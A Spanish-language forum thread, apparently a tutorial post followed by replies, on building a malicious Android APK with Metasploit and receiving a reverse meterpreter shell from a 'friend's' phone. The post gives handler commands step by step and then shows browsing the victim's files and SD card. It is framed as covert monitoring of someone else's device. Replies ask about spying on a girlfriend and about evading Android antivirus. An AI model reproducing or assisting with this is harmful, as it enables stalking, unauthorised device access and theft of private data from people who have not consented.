Buenas aca les dejo un tutorial para realizar server para android usando la terminal de Ubuntu Linux mediante Kali y Metasploit.
En este tuto se vera como monitorear cualquier móvil Android usando las consolas msfpayload y msfconsole en Kali Linux. Esto debe instalarse en su PC. No necesita acceso físico al celular del amigo para monitorear.
Requisitos:
Kali software en el sistema operativo Linux (solamente).
Framework Metasploit actualizado.

Monitoreo de actividad del sistema, incluyendo manejo e instalación de aplicaciones.
Paso 1: Ejecutamos el siguiente comando en una terminal vacía de Kali Linux.
Imagen

Una vez insertado este comando, le aparecerá en la pantalla este resultado:

Imagen

Paso 2: Ponemos “ls” en la línea de comandos e ingresamos.

Imagen

Ahora el archivo ya se ha creado, entonces solo debemos enviar el archivo al amigo y tendrá que instalar ese archivo de aplicación en el celular android.
Paso 3: Pero antes de eso, para aceptar conexiones, necesitamos ir a “msfconsole”, digitando: “msfconsole” en una nueva terminal:

Imagen

Tomará algo de tiempo, esperamos pacientemente… Luego aparecerá una pantalla similar a esta:

Imagen

Paso 4: Ya lo tenemos, entonces en esa nueva terminal que aparece, la “msfconsole”, vamos a buscar el multihandler. Ponemos la siguiente línea de comandos: “search multi/handler” de la siguiente manera.

Imagen

Pulsamos “Enter” y nos aparecerá el siguiente resultado:

Imagen

Paso 5: Entonces a continuación debemos digitar “Use exploit/multi/handler”.

Imagen

Paso 6: Configuramos el “payload” que habíamos tomado en “msfpayload” (android/meterpreter/reverse_tcp), entonces insertamos “set PAYLOAD android/meterpreter/reverse_tcp” y la terminal se verá como la siguiente:

Imagen

Y ya el “payload” está configurado.
Paso 7: Ponemos las opciones como LHOST y LPORT (la misma que hemos dado en “msfpayload”). Para eso ponemos “show options”.

Imagen

Podemos ver que el LPORT ya está ahí con su valor.
Paso 8: Ahora solo debemos cambiar el LHOST. (Si es que en su pantalla no le aparece, lo puede configurar manualmente). Podemos utilizar el siguiente comando: “set LHOST 192.168.0.121”.

Imagen

Una vez hecho esto, el valor para LHOST ya fue definido. Podemos digitar nuevamente “show options” para ver los nuevos valores de LHOST y LPORT.

Imagen

Paso 9: Digitamos “exploit” y aparecerá algo como esto. En la segunda línea de los resultados veremos: “Starting the payload handler…”

Imagen

Ahora todo ya está configurado. Solo esperamos a que el amigo cliqué en el archivo que creaste. Una vez lo ejecute, recibirás una conexión “meterpreter”. La terminal se verá como la siguiente:

Imagen

Como puedes ver, ahora cuentas con una sesión “meterpreter”.

Para más información de lo que hemos hecho, digitamos en comando “sysinfo”. Vemos que el resultado en OS narra una unión entre Linux y Android.

Imagen

Si a continuación ingresamos el símbolo de interrogación “?” vemos a la siguiente información:

Imagen

Si ponemos “Ifconfig”, revelará las interfaces:

Para revelar la información contenida en el android, ponemos los siguientes comandos en orden: “pwd” luego “cd..” seguido de “cd /” y “ls”. Como en la siguiente imagen:

Imagen

De esta manera hemos obtenido un árbol completo de archivos como la siguiente:

Imagen

Paso 10: Ingresamos a la tarjeta SD con los comandos: “cd sdcard” y “ls” como la siguiente imagen:

Imagen

Luego ponemos “cd download” y “ls” seguido…

Imagen

podemos ver las aplicaciones que el amigo ha descargado.

Imagen

Podemos incluso hacer modificaciones en el teléfono del amigo.
En la página oficial Kali.org pueden descargar el programa de manera gratuita.

Espero les haya gustado el Tutorial (solo con fines educativos)
Regards...
_VERSION
hey nose si seguiras usando este foro pero me interesa realizar esa accion para eso de comprovar si la novia es fiel ... vvamos lo tipico
 pero no me salen las imagenes de los comandos y demas instruciones y ps no puedo ... si me pudieras echar una mano te lo agradeceria
die: escribió: esa guia ya es un poco vieja ya que no es msfpayalod ahora es msfvenom
oye sabes como hacer para que el antivirus del android no lo reconozca
Responder

Volver a “Manuales y Tutoriales”